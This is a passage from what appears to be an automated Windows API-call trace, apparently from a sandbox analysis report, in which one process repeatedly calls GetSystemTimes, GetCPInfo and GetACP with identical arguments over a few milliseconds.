lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.986] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.987] GetACP () returned 0x4e4 [0043.987] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.987] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.987] GetACP () returned 0x4e4 [0043.987] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.987] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.987] GetACP () returned 0x4e4 [0043.987] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.987] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.987] GetACP () returned 0x4e4 [0043.987] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.987] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.987] GetACP () returned 0x4e4 [0043.987] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.987] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.987] GetACP () returned 0x4e4 [0043.987] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.987] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.987] GetACP () returned 0x4e4 [0043.987] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.987] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.987] GetACP () returned 0x4e4 [0043.987] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.987] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.987] GetACP () returned 0x4e4 [0043.987] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.987] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.987] GetACP () returned 0x4e4 [0043.987] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.988] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.988] GetACP () returned 0x4e4 [0043.988] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.988] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.988] GetACP () returned 0x4e4 [0043.988] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.988] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.988] GetACP () returned 0x4e4 [0043.988] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.988] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.988] GetACP () returned 0x4e4 [0043.988] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.988] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.988] GetACP () returned 0x4e4 [0043.988] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.988] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.988] GetACP () returned 0x4e4 [0043.988] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.988] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.988] GetACP () returned 0x4e4 [0043.988] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.988] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.988] GetACP () returned 0x4e4 [0043.988] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.988] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.988] GetACP () returned 0x4e4 [0043.988] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.989] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.989] GetACP () returned 0x4e4 [0043.989] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.989] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.989] GetACP () returned 0x4e4 [0043.989] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.989] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.989] GetACP () returned 0x4e4 [0043.989] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.989] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.989] GetACP () returned 0x4e4 [0043.989] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.989] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.989] GetACP () returned 0x4e4 [0043.989] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.989] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.989] GetACP () returned 0x4e4 [0043.989] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.989] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.989] GetACP () returned 0x4e4 [0043.989] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.989] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.989] GetACP () returned 0x4e4 [0043.989] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.989] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.989] GetACP () returned 0x4e4 [0043.989] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.989] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.989] GetACP () returned 0x4e4 [0043.989] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.990] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.990] GetACP () returned 0x4e4 [0043.990] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.990] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.990] GetACP () returned 0x4e4 [0043.990] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.990] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.990] GetACP () returned 0x4e4 [0043.990] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.990] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.990] GetACP () returned 0x4e4 [0043.990] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.990] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.990] GetACP () returned 0x4e4 [0043.990] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.990] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.990] GetACP () returned 0x4e4 [0043.990] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.990] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.990] GetACP () returned 0x4e4 [0043.990] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.990] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.990] GetACP () returned 0x4e4 [0043.990] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.990] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.990] GetACP () returned 0x4e4 [0043.990] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.990] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.991] GetACP () returned 0x4e4 [0043.991] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.991] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.991] GetACP () returned 0x4e4 [0043.991] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.991] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.991] GetACP () returned 0x4e4 [0043.991] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.991] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.991] GetACP () returned 0x4e4 [0043.991] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.991] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.991] GetACP () returned 0x4e4 [0043.991] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.991] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.991] GetACP () returned 0x4e4 [0043.991] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.991] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.991] GetACP () returned 0x4e4 [0043.991] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.991] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.991] GetACP () returned 0x4e4 [0043.991] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.991] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.991] GetACP () returned 0x4e4 [0043.991] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.991] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.991] GetACP () returned 0x4e4 [0043.992] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.992] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.992] GetACP () returned 0x4e4 [0043.992] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.992] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.992] GetACP () returned 0x4e4 [0043.992] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.992] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.992] GetACP () returned 0x4e4 [0043.992] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.992] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.992] GetACP () returned 0x4e4 [0043.992] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.992] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.992] GetACP () returned 0x4e4 [0043.992] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.992] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.992] GetACP () returned 0x4e4 [0043.992] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.992] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.992] GetACP () returned 0x4e4 [0043.992] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.992] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.992] GetACP () returned 0x4e4 [0043.992] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.992] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.992] GetACP () returned 0x4e4 [0043.992] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.993] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.993] GetACP () returned 0x4e4 [0043.993] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.993] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.993] GetACP () returned 0x4e4 [0043.993] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.993] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.993] GetACP () returned 0x4e4 [0043.993] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.993] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.993] GetACP () returned 0x4e4 [0043.993] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.993] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.993] GetACP () returned 0x4e4 [0043.993] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.993] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.993] GetACP () returned 0x4e4 [0043.993] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.993] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.993] GetACP () returned 0x4e4 [0043.993] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.993] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.993] GetACP () returned 0x4e4 [0043.993] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.993] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.993] GetACP () returned 0x4e4 [0043.993] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.994] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.994] GetACP () returned 0x4e4 [0043.994] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.994] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.994] GetACP () returned 0x4e4 [0043.994] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.994] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.994] GetACP () returned 0x4e4 [0043.994] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.994] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.994] GetACP () returned 0x4e4 [0043.994] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.994] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.994] GetACP () returned 0x4e4 [0043.994] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.994] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.994] GetACP () returned 0x4e4 [0043.994] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.994] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.994] GetACP () returned 0x4e4 [0043.994] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.994] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.994] GetACP () returned 0x4e4 [0043.994] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.994] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.994] GetACP () returned 0x4e4 [0043.994] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, 